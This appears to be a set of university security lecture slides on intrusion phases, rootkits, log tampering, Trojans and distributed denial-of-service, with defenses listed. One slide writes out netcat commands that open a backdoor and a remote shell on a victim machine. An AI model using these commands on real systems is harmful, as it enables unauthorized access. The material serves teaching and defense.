![Page 1: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/1.jpg)
• Intrusions (vulnerability, exploit)• Intrusion phases• Reconnaissance (non-technical, technical)
– Interrogating DNS, split-horizon DNS• Scanning
– Learn about live machines, open ports, firewall rules, network topology, OSes, vulnerabilities
– NATs– Firewalls
• Gaining access– Buffer overflow attacks– Sniffing– ARP poisoning, DNS poisoning– Spoofing TCP sessions
Summary From the Last Lecture
![Page 2: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/2.jpg)
• Midterm in two weeks• Midterm review next week
– We will go over two sample midterms, posted on class Web page
– Bring any questions you may have• Reading list posted on the class Web page
Announcements
![Page 3: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/3.jpg)
• Packet (stateless) firewall– Rules speak about IP/TCP header fields– No connection state kept– E.g. drop all traffic with TCP SYN and src IP from the outside
• Statefull firewall– Connection state is kept– E.g. drop all traffic except TCP ACK on established TCP connections
• Proxy firewall– Act as a middleman to every connection, i.e. act as the destination and
the source for every connection.– Can normalize protocols, reset TTL fields, etc.
Firewall Types
![Page 4: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/4.jpg)
Phase 4: Maintaining Access• Attacker establishes a listening application on a
port (backdoor) so he can log on any time with or without a password
• Attackers frequently close security holes they find to stop others from taking over their compromised machines
![Page 5: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/5.jpg)
Netcat Tool• Similar to Linux cat command
– http://netcat.sourceforge.net/– Client: Initiates connection to any port on remote machine– Server: Listens on any port– To open a shell on a victim machine
On victim machine: nc –l –p 1234/* This opens a backdoor */
On attacker machine: nc 123.32.34.54 1234 –c /bin/sh/* This enters through a backdoor, opens a shell */
Dangerous
![Page 6: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/6.jpg)
Netcat Tool• Used for
– Port scanning– Backdoor– Relaying the attack (stepping stones)
![Page 7: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/7.jpg)
Trojans• Application that claims to do one thing (and looks
like it) but it also does something malicious• Users download Trojans from Internet (thinking they
are downloading a free game) or get them as greeting cards in E-mail, or as ActiveX controls when they visit a Web site
• Trojans can scramble your machine– They can also open a backdoor on your system, steal data,
misuse your machine, etc.• They will report successful infection to the attacker
![Page 8: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/8.jpg)
Back Orifice• Trojan application that can
– Log keystrokes– Steal passwords– Create dialog boxes– Mess with files, processes or system (registry)– Redirect packets– Set up backdoors– Take over screen and keyboard– http://www.bo2k.com/
Dangerous
![Page 9: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/9.jpg)
Trojan Defenses• Antivirus software• Don’t download suspicious software• Check MD5 sum on trusted software you
download• Disable automatic execution of attachments
![Page 10: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/10.jpg)
At the End of Maintaining Access• The attacker has opened a backdoor and can now
access victim machine at any time
![Page 11: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/11.jpg)
Phase 5: Covering Tracks• Rootkits• Alter logs• Create hard-to-spot files• Use covert channels
![Page 12: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/12.jpg)
Application Rootkits• Alter or replace system components
(for instance DLLs)• E.g., on Linux attacker replaces ls program• Rootkits frequently come together with sniffers:
– Capture a few characters of all sessions on the Ethernet and write into a file to steal passwords
– Administrator would notice an interface in promiscuous mode• Not if attacker modifies an application that shows interfaces -
netstat
![Page 13: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/13.jpg)
Application Rootkits• Attacker will modify all key system applications that
could reveal his presence– List processes e.g. ps– List files e.g. ls– Show open ports e.g. netstat– Show system utilization e.g. top
• He will also substitute modification date with the one in the past
![Page 14: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/14.jpg)
Defenses Against App. Rootkits• Don’t let attackers gain root access• Use integrity checking of files:
– Carry a CD with md5sum, check hashes of system files against hashes advertised on vendor site or hashes you stored before
• Use Tripwire– Free integrity checker that saves md5 sums of all
important files in a secure database (read only CD), then verifies them periodically
– http://www.tripwire.org/
![Page 15: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/15.jpg)
Kernel Rootkits• Replace system calls
– Intercept calls to open one application with calls to open another, of attacker’s choosing
– Now even checksums don’t help as attacker did not modify any system applications
– You won’t even see attacker’s files in file listing– You won’t see some processes or open ports
• Usually installed as kernel modules• Defenses: disable kernel modules
![Page 16: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/16.jpg)
Altering Logs• Attackers can:
– Stop logging services– Load files into memory, change them– Restart logging service– Or simply change log file through scripts
• Change login and event logs, command history file, last login data
![Page 17: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/17.jpg)
Defenses Against Altering Logs• Use separate log servers
– Machines will send their log messages to these servers• Encrypt log files• Make log files append only• Save logs on write-once media
![Page 18: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/18.jpg)
Creating Hard-to-Spot Files• Names could look like system file names, but slightly
changed– Start with .– Start with . and add spaces– Make files hidden
• Defenses: intrusion detection systems and caution
![Page 19: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/19.jpg)
Denial of Service
![Page 20: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/20.jpg)
Distributed Denial Of Service?
![Page 21: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/21.jpg)
Distributed Denial Of Service?
![Page 22: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/22.jpg)
Denial of Service Attacks
• Unlike other forms of computer attacks, goal isn’t access or theft of information or services
• The goal is to stop the service from operating– To deny service to legitimate users– Slowing down may be good enough
• This is usually a temporary effect that passes as soon as the attack stops
![Page 23: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/23.jpg)
How Can a Service Be Denied?
• Lots of ways– Crash the machine– Or put it into an infinite loop– Crash routers on the path to the machine– Use up a key machine resource– Use up a key network resource– Deny another service needed for this one (DNS)
• Using up resources is the most common approach
![Page 24: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/24.jpg)
High-level Attack Categorization
• Floods• Congestion control exploits• Unexpected header values• Invalid content• Invalid fragments• Large packets• Impersonation attacks
![Page 25: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/25.jpg)
Simple Denial of Service
25
![Page 26: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/26.jpg)
Simple Denial of Service• One machine tries to bring down another
machine• There is a fundamental problem for the
attacker:– The attack machine must be “more powerful” than
the target machine to overload it OR– Attacker uses approaches other than flooding
• The target machine might be a powerful server
![Page 27: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/27.jpg)
Denial of Service and Asymmetry
• Sometimes generating a request is cheaper than formulating a response e.g. sending a bogus packet is cheaper than decrypting this packet and checking that it’s bogus
• If so, one attack machine can generate a lot of requests, and effectively multiply its power
• Not always possible to achieve this asymmetry• This is called amplification effect
![Page 28: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/28.jpg)
DDoS “Solves” That Problem
• Use multiple machines to generate the workload
• For any server of fixed power, enough attack machines working together can overload it
• Enlist lots of machines and coordinate their attack on a single machine
![Page 29: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/29.jpg)
Distributed Computing
![Page 30: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/30.jpg)
Typical Attack Modus Operandi
![Page 31: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/31.jpg)
Is DDoS a Real Problem?
• Yes, attacks happen every day– One study reported ~4,000 per week1
• On a wide variety of targets• Tend to be highly successful• There are very few mechanisms that can stop
certain attacks• There have been successful attacks on major
commercial sites
1”Inferring Internet Denial of Service Activity,” Moore, Voelker, and Savage, Usenix Security Symposium, 2002
![Page 32: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/32.jpg)
DDoS on Twitter• August 2009, hours-long service outage
– 44 million users affected• At the same time Facebook, LiveJournal,
YouTube and Blogger were under attack– Only some users experienced an outage
• Real target: a Georgian bloggerImage borrowed from Wired.comarticle. Originallyprovided by Arbor
Networks
![Page 33: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/33.jpg)
DDoS on Mastercard and Visa• December 2010• Parts of services went down briefly• Attack launched by a group of vigilantes called
Anonymous– Bots recruited through social engineering– Directed to download DDoS software and take
instructions from a master– Motivation: Payback to services that cut their support of
WikiLeaks after their founder was arrested on unrelated charges
• Several other services affected
![Page 34: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/34.jpg)
Potential Effects of DDoS Attacks
• Most (if not all) sites could be rendered non-operational
• The Internet could be largely flooded with garbage traffic
• Essentially, the Internet could grind to a halt– In the face of a very large attack
• Almost any site could be put out of business– With a moderate sized attack
![Page 35: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/35.jpg)
Who Is Vulnerable?
• Everyone connected to the Internet can be attacked
• Everyone who uses Internet for crucial operations can suffer damages
![Page 36: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/36.jpg)
But My Machines Are Well Secured!
36
Doesn’t matter!The problem isn’t your vulnerability, it’s everyone elses’
![Page 37: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/37.jpg)
But I Have a Firewall!
Doesn’t matter! Either the attacker slips his traffic into
legitimate traffic
Or he attacks the firewall
![Page 38: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/38.jpg)
But I Use a VPN! Doesn’t matter!
The attacker can fill your tunnel with garbageSure, you’ll detect it and discard it . . .
But you’ll be so busy doing so that you’ll have no time for your real work
![Page 39: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/39.jpg)
But I’m Heavily Provisioned
Doesn’t matter!
The attacker can probably get enough resources to overcome any level of resources you buy
![Page 40: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/40.jpg)
Attack Toolkits• Widely available on the net
– Easily downloaded along with source code– Easily deployed and used
• Automated code for: – Scanning – detection of vulnerable machines – Exploit – breaking into the machine – Infection – placing the attack code
• Rootkits– Hide the attack code – Restart the attack code– Keep open backdoors for attacker access
• DDoS attack code
![Page 41: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/41.jpg)
DDoS Attack Code• Attacker can customize:
– Type of attack • UDP flood, ICMP flood, TCP SYN flood, Smurf attack
(broadcast ping flood)• Web server request flood, authentication request flood, DNS
flood– Victim IP address– Duration– Packet size– Source IP spoofing– Dynamics (constant rate or pulsing)– Communication between master and slaves
![Page 42: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/42.jpg)
Implications Of Attack Toolkits
• You don’t need much knowledge or great skills to perpetrate DDoS
• Toolkits allow unsophisticated users to become DDoS perpetrators in little time
• DDoS is, unfortunately, a game anyone can play
![Page 43: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/43.jpg)
DDoS Attack Trends• Attackers follow defense approaches, adjust their
code to bypass defenses• Use of subnet spoofing defeats ingress filtering• Use of encryption and decoy packets, IRC or P2P
obscures master-slave communication• Encryption of attack packets defeats traffic
analysis and signature detection• Pulsing attacks defeat slow defenses and
traceback• Flash-crowd attacks generate legitimate (well-
formed) application traffic
![Page 44: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/44.jpg)
Implications For the Future• If we solve simple attacks, DDoS perpetrators will
move on to more complex attacks• Recently seen trends:
– Larger networks of attack machines– Rolling attacks from large number of machines– Attacks at higher semantic levels– Attacks on different types of network entities– Attacks on DDoS defense mechanisms
• Need flexible defenses that evolve with attacks
![Page 45: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/45.jpg)
How Come We Have DDoS?• Natural consequence of the way Internet is organized
– Best effort service means routers don’t do much processing per packet and store no state – they will let anything through
– End to end paradigm means routers will enforce no security or authentication – they will let anything through
• It works real well when both parties play fair• It creates opportunity for DDoS when one party cheats
![Page 46: Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning](https://reader036.vdocuments.mx/reader036/viewer/2022070500/568168bc550346895ddfaf53/html5/thumbnails/46.jpg)
There Are Still No Strong Defenses Against DDoS
• You can make yourself harder to attack• But you can’t make it impossible• And, if you haven’t made it hard enough, there’s not
much you can do when you are attacked– There are no patches to apply– There is no switch to turn– There might be no filtering rule to apply– Grin and bear it